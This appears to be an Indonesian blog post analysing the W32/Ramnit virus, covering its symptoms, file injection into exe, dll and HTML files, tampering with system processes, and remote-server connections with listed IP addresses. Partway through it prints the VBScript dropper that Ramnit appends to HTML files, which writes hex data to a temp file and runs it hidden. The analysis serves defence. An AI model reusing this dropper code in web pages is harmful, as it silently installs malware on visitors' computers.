Ciri
dan gejala
yang kasat
mata
-
Muncul pop-up iklan atau pop-up dengan konten pornografi/perjudianDalam beberapa waktu tertentu, browser akan membuka pop-up iklan atau pop-up yang berisi konten pornografi atau perjudian (kasino). Hal ini yang terkadang membuat pengguna komputer menjadi tidak nyaman. (lihat gambar 1)Gambar 1, Pop-up iklan yang dijalankan W32/Ramnit
-
Icon Removable media (USB Flash) berubah menjadi icon Folder (lihat gambar 2)
Gambar
2, Icon
USB Flash yang
diubah
W32/Ramnit
-
User tidak dapat mengakses USB Flash dengan menampilkan pesan �Access is denied� (lihat gambar 3)
Gambar
3,
Blok akses USB
Flash
-
Muncul pesan �Compressed (zipped) Folders� pada saat mengakses Flash disk (lihat Gambar 4)
Gambar
4,
Pesan error
saat akses USB
Flash
-
Muncul banyak file dengan nama file �Copy of Shortcut to (1).lnk� s/d �Copy of Shortcut to (4).lnk� di USB Flash. (lihat gambar 5)
Gambar
5,
File virus
yang di drop
oleh virus di
USB Flash
-
Salah satu hal yang unik dan membuat virus ini sangat mudah aktif dan sulit dibasmi adalah setiap kali user melakukan klik kanan, selain menampilkan menu klik kanan, secara tidak langsung pengguna komputer juga menjalankan virus ini.
Selain
gejala
yang kasat
mata, Ramnit
akan melakukan
aksi berbahaya
baik yang
terlihat
maupun tidak
terlihat,
namun
akibatnya
sangat terasa
dan berbahaya
untuk
korbannya
karena selain
mencuri data
dari komputer
korbannya, ia
juga melakukan
pengunduhan
malware lain
yang tidak
kalah
berbahaya
seperti
Sality,
Wapomi,
Viking,
Renosator,
PWSTool,
Alman, Kolab
dan banyak
malware
berbahaya
lainnya.
Adapun lebih
detailnya aksi
Ramnit yang
terkadang
tidak kasat
mata namun
berbahaya
dapat dilihat
dari link di
bawah ini.
Aksi
Ramnit yang
berbahaya
-
Muncul script error atau pop-up error setelah pop-up iklan yang muncul.Setelah pop-up iklan yang muncul, akan muncul pop-up error atau script error dari browser. Muncul-nya script error ini mirip seperti virus "ARP Spoofing" pada tahun 2008. (lihat gambar 6)
Gambar
6, Pop-up
error atau
script error
-
Injeksi file .exe, .dllSama seperti varian malware Sality, Alman dan Virut, W32/Ramnit melakukan injeksi file exe. Hanya saja, W32/Ramnit juga melakukan injeksi terhadap file DLL (dynamic load library). File exe dan dll yang diinjeksi akan bertambah sekitar antara 100 - 120 kb, tergantung varian Ramnit yang menginfeksi. Meskipun begitu, tidak semua file .exe dan .dll di drive C: yang diinjeksi.
-
Injeksi file HTM / HTML
-
Sedangkan pada footer, W32/Ramnit menambahkan script : (lihat gambar 8)Set FSO = CreateObject ("Scripting.FileSystemObject")DropPath = FSO.GetSpecialFolder(2) & '\" DropFileNameIf FSO.FileExists(DropPath)=False ThenSet fileobj = FSO.CreateTextFile(DropPath, True)For i = 1 To Len(WriteData) Step2Fileobj.write chr (CLng("&H" & Mid(WriteData, i,2)))NextFileobj.closeEnd IfSet WSHshell = CreateObject ("Wscript.shell")WSHshell.Run DropPath, 0Gambar 8, Script yang ditambahkan pada footer file HTML
Selain
menginjeksi
file .exe dan
.dll,
W32/Ramnit
juga melakukan
injeksi
terhadap file
HTM dan HTML.
Injeksi
dilakukan
dengan
menambahkan
pada header
dan footer.
(lihat gambar
7).
Pada header,
W32/Ramnit
menambahkan
script :
DropFileName
=
"svchost.exe"
Gambar 7,
Script yang
ditambahkan
pada header
file HTML
-
Membuat fungsi services Windows menjadi blankDengan aksi melakukan injeksi file pada file "iexplore.exe" dan file "services.exe", serta menambahkan script pada file web (htm/html) membuat fungsi dari services Windows menjadi blank. (lihat gambar 9)
Gambar
9, Fungsi
Services
Windows
menjadi blank-
Membuat komputer hang/lambat dan bahkan koneksi jaringan menjadi terputus. Beberapa gejala yang terjadi dan penyebabnya dapat dijelaskan sebagai berikut berdasarkan jenis file yang di injeksi Ramnit :
-
C:\WINDOWS\system32\svchost.exe, �svchost.ece� adalah file sistem yang berhubungan dengan koneksi jaringan. Akibatnya jaringan komputer akan terputus ketika file ini di injeksi.
-
C:\WINDOWS\system32\lsass.exe, �lsass.exe� adalah file sistem yang berhubungan dengan aktivitas komputer. Akibat injeksi ini, sistem komputer akan menjadi lambat / hang.
-
C:\WINDOWS\system32\services.exe, �services.exe� adalah file sistem yang berhubungan dengan services dan driver yang berjalan. Akibat injeksi ini akan menyebabkan gangguan pada servis dan driver yang di injeksi.
-
C:\Program Files\Internet Explorer\iexplore.exe, �iexplore.exe� adalah file browser Internet Explorer dari Microsoft. Tujuan injeksi ini adalah agar browser bisa dikontrol untuk melakukan koneksi ke remote server yang telah ditentukan oleh Ramnit sebelumnya.
-
Aktif pada proses memoriSeperti diutarakan di atas, setelah berhasil menguasai Internet Explorer, W32/Ramnit mencoba melakukan koneksi ke Remote Server menggunakan Internet Explorer yang telah di injeksi. Hal ini bisa kita lihat pada proses task manager, walaupun kita tidak sedang membuka IE / Internet Explorer (lihat gambar 10)
Gambar
10, Proses
IEXPLORE.EXE
(Internet
Explorer) yang
telah
di-injeksi
oleh
W32/Ramnit
-
Melakukan koneksi ke Remote Server
Malware
W32/Ramnit
melakukan
koneksi ke
Remote Server
untuk
melakukan
pengiriman
informasi yang
dibutuhkan
pada Remote
Server. Remote
Server yang
digunakan
yaitu
diantara-nya :
195.2.252.247
195.2.252.252
69.50.193.157
74.125.227.17
74.125.227.18
74.125.227.20
95.211.127.69
-
Melakukan transfer data ke Remote ServerSelain mencoba melakukan koneksi dan ber-komunikasi dengan remote server, W32/Ramnit juga mencoba melakukan transfer data dari komputer korban ke Remote Server dan sebaliknya mengirim file malware ke dalam komputer korban. (lihat gambar 11)
Gambar
11, Transfer
data antara
komputer
korban dengan
Remote Server-
Melakukan broadcastSama seperti hal-nya worm Conficker, W32/Ramnit juga melakukan broadacast pada jaringan. Yang ber-beda adalah untuk W32/Ramnit hanya melakukan pada satu alamat yaitu : ADX.ADNXS.COM (lihat gambar 12)
Gambar
12, Broadcast
yang dilakukan
oleh
W32/Ramnit
:a
:b
:c
:d
:e
:f
:g
:h
:i
:j
:k
:l
:m
:n
:o
:p
:q
:r
:s
:t
Tidak ada komentar:
Posting Komentar